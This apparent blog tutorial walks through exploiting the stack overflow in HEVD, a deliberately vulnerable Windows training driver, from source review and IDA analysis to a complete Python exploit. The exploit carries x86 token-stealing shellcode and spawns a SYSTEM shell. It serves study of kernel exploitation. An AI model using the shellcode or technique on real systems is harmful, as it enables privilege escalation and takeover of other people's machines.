HEVD Windows Kernel Exploitation 2 – Stack Overflow

After preparing for OSEE for over a year and finishing most of the topics in the previous year’s syllabus, I finally found the time to start writing a blog series about everything I’ve learned so far (with more to come, as this is a long journey). We’ll be focusing on various kernel exploitation techniques using this incredible resource, HEVD, a deliberately vulnerable driver: https://github.com/hacksysteam/HackSysExtremeVulnerableDriver

Here’s the structure of this post:

  • Source Code Review
  • Analysis with IDA and finding IOCTL
  • Crafting the initial Exploit
  • Token Stealing & Assembly Code Manual Analysis
  • Final Exploit and Spawn the Shell!

Alright, so each section will include the most important tips and tricks merged with a bit of theory. I’ll try to keep it short, as the topic is hard enough to digest already (remind me of these words in the more complex techniques later 😛). So let’s get started!

Source Code Review:

Go to the source code file BufferOverflowStack.c (I’m using version 2.0 of HEVD; in earlier versions the file names may differ):

https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Driver/HEVD/Windows/BufferOverflowStack.c

So let’s go through the code to analyze:

The structure of the code is as below:

// verify if the buffer resides in user mode
#ifdef SECURE
// RtlCopyMemory secure call
#else
// RtlCopyMemory vulnerable call
#endif
// handle the exception if something goes wrong
// IoctlHandler(), which calls the TriggerBufferOverflowStack function

So let’s see each section of the source code:

// verify if the buffer resides in user mode

__declspec(safebuffers)
NTSTATUS
TriggerBufferOverflowStack(
    _In_ PVOID UserBuffer,
    _In_ SIZE_T Size
)
{
    NTSTATUS Status = STATUS_SUCCESS;
    ULONG KernelBuffer[BUFFER_SIZE] = { 0 };
    PAGED_CODE();
    __try
    {
        ProbeForRead(UserBuffer, sizeof(KernelBuffer), (ULONG)__alignof(UCHAR));
        DbgPrint("[+] UserBuffer: 0x%p\n", UserBuffer);
        DbgPrint("[+] UserBuffer Size: 0x%zX\n", Size);
        DbgPrint("[+] KernelBuffer: 0x%p\n", &KernelBuffer);
        DbgPrint("[+] KernelBuffer Size: 0x%zX\n", sizeof(KernelBuffer));

Secure implementation of the function RtlCopyMemory(): This is secure because the developer is passing a size equal to size of KernelBuffer to RtlCopyMemory()/memcpy().

#ifdef SECURE

RtlCopyMemory((PVOID)KernelBuffer, UserBuffer, sizeof(KernelBuffer));

Vulnerable implementation of the function RtlCopyMemory(): This is a vanilla stack-based overflow because the developer passes the user-supplied Size directly to RtlCopyMemory()/memcpy() without checking that it is no larger than the size of KernelBuffer.

#else
DbgPrint("[+] Triggering Buffer Overflow in Stack\n");
RtlCopyMemory((PVOID)KernelBuffer, UserBuffer, Size);
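To make the difference between the two branches concrete, here is a minimal user-mode model in Python 3 (it is not driver code). It assumes that BUFFER_SIZE is 512 ULONGs (2048 bytes) and that the saved return address sits 2080 bytes from the start of KernelBuffer, which is the offset used later in this post. The Frame class and the copy helper are hypothetical names made up for this sketch.

```python
KERNEL_BUFFER_SIZE = 512 * 4   # assumed: BUFFER_SIZE (512) * sizeof(ULONG)
RET_OFFSET = 2080              # assumed: offset of the saved return address


class Frame:
    """Toy model of the stack frame of TriggerBufferOverflowStack()."""

    def __init__(self):
        # KernelBuffer, whatever lies between it and the return address,
        # and finally the 4-byte saved return address.
        self.memory = bytearray(RET_OFFSET + 4)
        self.memory[RET_OFFSET:] = (0x11223344).to_bytes(4, "little")

    def return_address(self):
        return int.from_bytes(self.memory[RET_OFFSET:RET_OFFSET + 4], "little")


def copy(frame, user_buffer, size, secure):
    """Mimic RtlCopyMemory(KernelBuffer, UserBuffer, n)."""
    # The secure branch ignores the caller's size and uses sizeof(KernelBuffer).
    n = KERNEL_BUFFER_SIZE if secure else size
    data = user_buffer[:n]
    frame.memory[:len(data)] = data


user_buffer = b"A" * RET_OFFSET + b"BBBB"

safe = Frame()
copy(safe, user_buffer, len(user_buffer), secure=True)

vulnerable = Frame()
copy(vulnerable, user_buffer, len(user_buffer), secure=False)

print(hex(safe.return_address()))        # 0x11223344
print(hex(vulnerable.return_address()))  # 0x42424242
```

In the secure case the copy stops at the end of the buffer, so the return address survives; in the vulnerable case the caller decides how far the copy runs.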

Then we have the IoctlHandler(). Let’s see what’s going on with this code block:

  • If the correct IOCTL code makes it to BufferOverflowStackIoctlHandler(), a UserBuffer (the user input) and a Size (the length of that input) are read from the request.
  • Then TriggerBufferOverflowStack() is called with UserBuffer and Size. This is where the vulnerability exists, via the RtlCopyMemory() call.
NTSTATUS
BufferOverflowStackIoctlHandler(
    _In_ PIRP Irp,
    _In_ PIO_STACK_LOCATION IrpSp
)
{
    SIZE_T Size = 0;
    PVOID UserBuffer = NULL;
    NTSTATUS Status = STATUS_UNSUCCESSFUL;

    UNREFERENCED_PARAMETER(Irp);
    PAGED_CODE();

    UserBuffer = IrpSp->Parameters.DeviceIoControl.Type3InputBuffer;
    Size = IrpSp->Parameters.DeviceIoControl.InputBufferLength;

    if (UserBuffer)
    {
        Status = TriggerBufferOverflowStack(UserBuffer, Size);
    }

    return Status;
}

Now it’s time to get into more theory with IOCTL:

Theory for the two Windows API functions we’ll use: CreateFileA() and DeviceIoControl()

Device drivers are kernel-mode objects, meaning a user-mode program first has to open a handle to the device before it can talk to the driver:

handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)

After obtaining the handle to the device driver, we can then send IOCTLs (I/O control codes), which reach the driver as IRPs (I/O request packets).

The Windows API function DeviceIoControl() is how user-mode apps communicate with kernel-mode drivers. (https://docs.microsoft.com/en-us/windows/win32/api/ioapiset/nf-ioapiset-deviceiocontrol)

The first argument of the function is the handle to the device driver.

kernel32.DeviceIoControl(<handle>, <IOCTL-code>, padding, len(padding), None, 0, byref(c_ulong()), None)

Both of these functions are located in kernel32.dll. In summary we use the following functions for the following reasons:

CreateFileA(): to create a handle to an I/O device.

DeviceIoControl(): We’ll use the handle created via CreateFileA() function as the first parameter and we’ll access the kernel mode object.
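The magic numbers in the CreateFileA() call are easier to read once they are named. The sketch below (Python 3, runs anywhere, makes no Windows API calls) pairs each argument with its parameter name from the Win32 documentation. The constant values are the ones defined in the Windows SDK headers; the create_file_args list is only an illustration.

```python
# Access-right and disposition constants as defined in the Windows SDK headers.
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 3

desired_access = GENERIC_READ | GENERIC_WRITE
print(hex(desired_access))  # 0xc0000000

# Parameter names of CreateFileA, paired with the values used in this post.
create_file_args = [
    ("lpFileName", "\\\\.\\HackSysExtremeVulnerableDriver"),
    ("dwDesiredAccess", desired_access),
    ("dwShareMode", 0),
    ("lpSecurityAttributes", None),
    ("dwCreationDisposition", OPEN_EXISTING),
    ("dwFlagsAndAttributes", 0),
    ("hTemplateFile", None),
]

for name, value in create_file_args:
    print(name, "=", value)
```

So 0xC0000000 asks for read and write access, and 0x3 tells Windows to open a device that already exists rather than create anything.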

Analysis with IDA

Let’s open the HEVD.sys driver file (the one we loaded with OSRLOADER earlier) in IDA and take a look at the functions present:

Let’s take a look at the IrpDeviceIoCtlHandler() function, which handles IRP requests with IOCTLs. The handler compares the IOCTL code from the IRP against each supported value until one matches, so you’ll see many IOCTLs here:

Let’s see the BufferOverflowStackIoctlHandler() function:

You see a “jump if zero” instruction that depends on the result of the instruction above it, sub eax, 222003h.
If the subtraction yields zero, i.e. the IOCTL code is exactly 0x222003, we go to the BufferOverflowStackIoctlHandler() function, which passes our input on to the vulnerable code.

When we scroll up, we see the following lines:

This means that if we send a value of 0x222003 as our IOCTL in our proof of concept, we can trigger the vulnerable code.
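The value 0x222003 is not arbitrary: IOCTL codes are packed bit fields built by the CTL_CODE macro from the Windows headers. The Python 3 sketch below reimplements that macro and decodes the value. The helper names ctl_code and decode_ioctl are made up for this example, and the function number 0x800 is simply what falls out of decoding 0x222003.

```python
FILE_DEVICE_UNKNOWN = 0x22
FILE_ANY_ACCESS = 0
METHOD_NEITHER = 3


def ctl_code(device_type, function, method, access):
    """Python equivalent of the CTL_CODE macro."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


def decode_ioctl(code):
    """Split an IOCTL code back into its four fields."""
    return {
        "device_type": (code >> 16) & 0xFFFF,
        "access": (code >> 14) & 0x3,
        "function": (code >> 2) & 0xFFF,
        "method": code & 0x3,
    }


ioctl = ctl_code(FILE_DEVICE_UNKNOWN, 0x800, METHOD_NEITHER, FILE_ANY_ACCESS)
print(hex(ioctl))  # 0x222003

fields = decode_ioctl(0x222003)
for name, value in fields.items():
    print(name, hex(value))
```

The method field decodes to METHOD_NEITHER, which is why the handler reads the raw user-mode pointer from Type3InputBuffer instead of a buffer copied by the I/O manager.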

Looking at the BufferOverflowStackIoctlHandler() function, we eventually land in the TriggerBufferOverflowStack() function. Let’s see what that function contains:

800 hex bytes (2048 bytes) is the length of the KernelBuffer.

So any input longer than 2048 bytes writes past the end of KernelBuffer, and once the overflow reaches the saved return address the kernel crashes with a BSOD (blue screen of death).

Exploit Version 1:

Our script structure will look like the following:

# imports for python
# create handle with CreateFileA() function
# exit if we cannot get a handle to the device
# buffer and shellcode
# DeviceIoControl() with the correct IOCTL and the handle

HackSysExtremeVulnerableDriver.c is responsible for creating the device, as we can see below:

This means that we will use the path \\.\HackSysExtremeVulnerableDriver in a call to CreateFileA() to open a handle for communication in our PoC, in the following format:

handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", …)

import struct, sys, os
from ctypes import *

kernel32 = windll.kernel32
handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)

if not handle or handle == -1:
    print "[+] Cannot get device handle."
    sys.exit(0)

# EIP overwrite
padding = "\x41" * 2080
padding += "\x42" * 4
padding += "\x43" * (3000 - len(padding))

# 0x222003 is the IOCTL code
kernel32.DeviceIoControl(handle, 0x222003, padding, len(padding), None, 0, byref(c_ulong()), None)
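Before sending the buffer, its layout can be checked offline. This small Python 3 sketch rebuilds the same pattern with bytes literals (the PoC above is Python 2, where plain strings are bytes) and confirms where the four B characters land.

```python
# Same pattern as the PoC: 2080 x "A", 4 x "B", then "C" up to 3000 bytes.
padding = b"\x41" * 2080
padding += b"\x42" * 4
padding += b"\x43" * (3000 - len(padding))

total_length = len(padding)
b_offset = padding.find(b"BBBB")
eip_value = int.from_bytes(padding[2080:2084], "little")

print(total_length)    # 3000
print(b_offset)        # 2080
print(hex(eip_value))  # 0x42424242
```

If EIP shows 42424242 at the crash, the four bytes at offset 2080 are the ones that end up as the return address.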

Let’s verify the EIP overwrite with WinDBG:

!sym noisy
ed nt!Kd_Default_Mask 8
.reload

Verify if the HEVD is loaded with the following command: lm m H*

Then, execute g in the command window to let the debuggee run, so we can execute the PoC.

Run the python script we just wrote above:

Verify that we overwrote EIP with the following command: r

Pass through the crash: Debug > Go Unhandled Exception and then type g again to execute.

We get the BSOD – and the 42424242 value of EIP:

So the first part was the initial foothold 😁 Now we can actually start the exploitation:

Token Stealing

This is one of the techniques we can use here. We need to escalate our privileges to NT AUTHORITY\SYSTEM. In order to do that, we’ll write a piece of shellcode that copies a token with SYSTEM privileges to the target process (cmd.exe).

First of all, the sample payload is provided to us by HackSysExtreme:

https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Exploit/Payloads.c

“What the heck does this mean?” you may say to yourself. Well, I’ll try to explain it all. Here’s the code, followed by its purpose:

pushad                              
xor eax, eax                         
mov eax, fs:[eax + KTHREAD_OFFSET]   
mov eax, [eax + EPROCESS_OFFSET]     
mov ecx, eax                         
mov edx, SYSTEM_PID                  

SearchSystemPID:
    mov eax, [eax + FLINK_OFFSET]    
    sub eax, FLINK_OFFSET
    cmp [eax + PID_OFFSET], edx      
    jne SearchSystemPID
mov edx, [eax + TOKEN_OFFSET]        
mov [ecx + TOKEN_OFFSET], edx                  
popad 
  • Get a pointer to the current process, which requires the following 2 values:
    • _KTHREAD_OFFSET
    • _EPROCESS_OFFSET
  • Walk the ActiveProcessLinks list in the SearchSystemPID loop until the process with the SYSTEM PID is found
  • Copy that process’s token over the current process’s token (the last 2 mov instructions)
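The steps above can be modelled in a few lines of Python 3. This is only a user-mode simulation of the list walk, not shellcode: the Process class, the link helper and the token strings are hypothetical stand-ins for _EPROCESS entries chained through ActiveProcessLinks.

```python
class Process:
    """Stand-in for an _EPROCESS entry."""

    def __init__(self, pid, token):
        self.pid = pid
        self.token = token
        self.flink = self  # next entry, like ActiveProcessLinks.Flink


def link(processes):
    """Chain the processes into a circular list."""
    for current, following in zip(processes, processes[1:] + processes[:1]):
        current.flink = following


def steal_system_token(current, system_pid=4):
    """Walk the list from `current` and copy the SYSTEM token onto it."""
    entry = current
    while True:                  # the SearchSystemPID loop
        entry = entry.flink      # mov eax, [eax + FLINK_OFFSET]
        if entry.pid == system_pid:
            break
        if entry is current:     # guard the shellcode does not have
            raise LookupError("no process with that PID")
    current.token = entry.token  # the last 2 mov instructions


system = Process(4, "SYSTEM token")
other = Process(400, "service token")
cmd = Process(1337, "user token")
link([system, other, cmd])

steal_system_token(cmd)
print(cmd.token)  # SYSTEM token
```

The real shellcode does the same thing with raw pointers, which is why it needs the exact offsets of the list entry, the PID and the token inside _EPROCESS.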

In order to find these values, we’ll use WinDBG. We’ll use the command syntax dt nt!_* for each data structure.

We’re going to start by analyzing _KPCR, which stands for Kernel Processor Control Region. This data structure contains a lot of information, so we’ll target specifically what we are looking for. The map to the values looks like the following:

  • _KPCR
    • _KPRCB
      • _KTHREAD
        • _KAPC_STATE
          • _KPROCESS (the first member of _EPROCESS)
            • ActiveProcessLinks
            • Token

So let’s get started:

kd> dt nt!_KPCR

Scroll down until you see _KPRCB. It’s +0x120 bytes away from _KPCR.

kd> dt nt!_KPRCB

You’ll see the pointer to the current _KTHREAD, which is +0x004 bytes away from _KPRCB, meaning it is +0x124 bytes away from _KPCR.

In the assembly code, we will use the fs segment register, which points to _KPCR in kernel mode on x86, to access the data structure.

mov eax, fs:[eax + KTHREAD_OFFSET]   

In order to find the offset of _EPROCESS of the current thread, we’ll go through the same logic:

kd> dt nt!_KTHREAD

Scroll down until you see _KAPC_STATE. It’s +0x040 bytes away from _KTHREAD.

kd> dt nt!_KAPC_STATE

You’ll see that _KPROCESS is +0x010 away from _KAPC_STATE, which makes it +0x050 bytes away from _KTHREAD.

mov eax, [eax + EPROCESS_OFFSET]     

Cool, now we need to find the token of the current process. Let’s find the values with the same logic:

kd> dt nt!_EPROCESS

See that UniqueProcessId (the PID) is +0x0b4, ActiveProcessLinks is +0x0b8 and Token is +0x0f8 bytes away from the start of _EPROCESS.
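The offset arithmetic from the dt output can be written down once so it is easy to re-check on another build. This is a Python 3 sketch using the Windows 7 x86 values quoted in this post; the constant names are my own and the numbers will differ on other Windows versions.

```python
# Offsets read from the dt output in this post (Windows 7 x86).
KPCR_TO_KPRCB = 0x120
KPRCB_TO_CURRENT_THREAD = 0x004
KTHREAD_TO_APC_STATE = 0x040
APC_STATE_TO_PROCESS = 0x010
EPROCESS_FLINK = 0x0B8
EPROCESS_TOKEN = 0x0F8

# Values the shellcode template calls KTHREAD_OFFSET and EPROCESS_OFFSET.
KTHREAD_OFFSET = KPCR_TO_KPRCB + KPRCB_TO_CURRENT_THREAD
EPROCESS_OFFSET = KTHREAD_TO_APC_STATE + APC_STATE_TO_PROCESS

print(hex(KTHREAD_OFFSET))   # 0x124
print(hex(EPROCESS_OFFSET))  # 0x50
print(hex(EPROCESS_FLINK), hex(EPROCESS_TOKEN))  # 0xb8 0xf8
```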

The last step is to list all of the current processes with the following command:

kd> !process 0 0

Look for the System process and pass its PID to the following command:

kd> !process <pid> 1

This will reveal the SYSTEM process access token. We will copy this token to our own cmd.exe, which will give us NT AUTHORITY\SYSTEM.

Let’s rewrite the assembly code with the known offsets and values:

  • _KTHREAD offset from _KPCR: 0x124
  • _EPROCESS offset from _KTHREAD: 0x50
  • UniqueProcessId (PID) from _EPROCESS: 0x0b4
  • ActiveProcessLinks from _EPROCESS: 0x0b8
  • Token from _EPROCESS: 0x0f8
pushad                              
xor eax, eax                         
mov eax, fs:[eax+0x124]   
mov eax, [eax+0x50]     
mov ecx, eax                         
mov edx, 0x4  ; PID of the System process

SearchSystemPID:
    mov eax, [eax+0xb8]
    sub eax, 0xb8
    cmp [eax+0xb4], edx
    jnz SearchSystemPID

mov edx, [eax + 0xf8]        
mov [ecx + 0xf8], edx                  
popad
pop ebp ;restore the base pointer
ret 0x8 ;return and clear the next 8 bytes
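A short jnz encodes its target as a signed one-byte displacement measured from the end of the jump instruction, so it is worth checking that the loop really jumps back to the start of the list walk. The Python 3 sketch below does that arithmetic using the instruction encodings from the final script further down; the signed8 helper and the instruction table are just scaffolding for this check.

```python
# (mnemonic, encoding) pairs, in order, as used in the final script.
instructions = [
    ("pushad", b"\x60"),
    ("xor eax, eax", b"\x31\xc0"),
    ("mov eax, fs:[eax+0x124]", b"\x64\x8b\x80\x24\x01\x00\x00"),
    ("mov eax, [eax+0x50]", b"\x8b\x40\x50"),
    ("mov ecx, eax", b"\x89\xc1"),
    ("mov edx, 0x4", b"\xba\x04\x00\x00\x00"),
    ("mov eax, [eax+0xb8]", b"\x8b\x80\xb8\x00\x00\x00"),
    ("sub eax, 0xb8", b"\x2d\xb8\x00\x00\x00"),
    ("cmp [eax+0xb4], edx", b"\x39\x90\xb4\x00\x00\x00"),
    ("jnz loop", b"\x75\xed"),
    ("mov edx, [eax+0xf8]", b"\x8b\x90\xf8\x00\x00\x00"),
    ("mov [ecx+0xf8], edx", b"\x89\x91\xf8\x00\x00\x00"),
    ("popad", b"\x61"),
    ("pop ebp", b"\x5d"),
    ("ret 0x8", b"\xc2\x08\x00"),
]


def signed8(value):
    """Interpret a byte as a signed 8-bit displacement."""
    return value - 256 if value > 127 else value


# Offset of every instruction from the start of the shellcode.
offsets = {}
position = 0
for text, encoding in instructions:
    offsets[text] = position
    position += len(encoding)
total_length = position

jnz_bytes = dict(instructions)["jnz loop"]
jnz_end = offsets["jnz loop"] + len(jnz_bytes)
target = jnz_end + signed8(jnz_bytes[1])

print(hex(target))                          # 0x14
print(hex(offsets["mov eax, [eax+0xb8]"]))  # 0x14
print(total_length)                         # 56
```

With the shellcode starting at offset 0, the displacement 0xed (-19) lands on mov eax, [eax+0xb8], the first instruction of the loop.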

Let’s write our final code with one more addition:

We’ll bypass DEP with VirtualAlloc: we allocate an RWX region, copy our shellcode into it, and use the address of that region as the value that overwrites EIP.

# Bypass DEP with VirtualAlloc 
# Allocate RWX region for shellcode
pointer = kernel32.VirtualAlloc(c_int(0),c_int(len(payload)),c_int(0x3000),c_int(0x40))
buf = (c_char * len(payload)).from_buffer(payload)

# Copy shellcode to newly allocated RWX region
kernel32.RtlMoveMemory(c_int(pointer),buf,c_int(len(payload)))
shellcode = struct.pack("<L",pointer)
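The struct.pack("<L", pointer) call turns the address into the 4 little-endian bytes that will sit on top of the saved return address. A quick Python 3 illustration, using a made-up address in place of whatever VirtualAlloc actually returns:

```python
import struct

pointer = 0x00420000  # hypothetical address, stands in for VirtualAlloc's result

# "<L" = little-endian unsigned 32-bit, the byte order x86 expects in memory.
shellcode = struct.pack("<L", pointer)
print(shellcode.hex())  # 00004200

# Placed after 2080 bytes of padding, it reads back as the same address.
padding = b"A" * 2080 + shellcode
recovered = struct.unpack("<L", padding[2080:2084])[0]
print(hex(recovered))   # 0x420000
```

Note that the variable named shellcode in the script holds only this pointer; the actual shellcode bytes live in payload, inside the RWX region.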

Final Script:

import struct, sys, os
from ctypes import *

kernel32 = windll.kernel32
handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)

if not handle or handle == -1:
    print "[+] Cannot get device handle."
    sys.exit(0)

payload = bytearray(
    "\x60"                            # pushad
    "\x31\xc0"                        # xor eax,eax
    "\x64\x8b\x80\x24\x01\x00\x00"    # mov eax,[fs:eax+0x124]
    "\x8b\x40\x50"                    # mov eax,[eax+0x50]
    "\x89\xc1"                        # mov ecx,eax
    "\xba\x04\x00\x00\x00"            # mov edx,0x4
    "\x8b\x80\xb8\x00\x00\x00"        # mov eax,[eax+0xb8]
    "\x2d\xb8\x00\x00\x00"            # sub eax,0xb8
    "\x39\x90\xb4\x00\x00\x00"        # cmp [eax+0xb4],edx
    "\x75\xed"                        # jnz SearchSystemPID (back to mov eax,[eax+0xb8])
    "\x8b\x90\xf8\x00\x00\x00"        # mov edx,[eax+0xf8]
    "\x89\x91\xf8\x00\x00\x00"        # mov [ecx+0xf8],edx
    "\x61"                            # popad
    "\x5d"                            # pop ebp
    "\xc2\x08\x00"                    # ret 0x8
)

# Defeating DEP with VirtualAlloc 
# Allocate RWX region for shellcode
pointer = kernel32.VirtualAlloc(c_int(0),c_int(len(payload)),c_int(0x3000),c_int(0x40))
buf = (c_char * len(payload)).from_buffer(payload)

# Copy shellcode to newly allocated RWX region
kernel32.RtlMoveMemory(c_int(pointer),buf,c_int(len(payload)))
shellcode = struct.pack("<L",pointer)

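# EIP overwrite: 2080 bytes of padding, then the address of the shellcode
padding = "A" * 2080 + shellcode

# 0x222003 is the IOCTL code
kernel32.DeviceIoControl(handle, 0x222003, padding, len(padding), None, 0, byref(c_ulong()), None)

# Spawn a new cmd.exe, which inherits the SYSTEM token
os.system("start cmd")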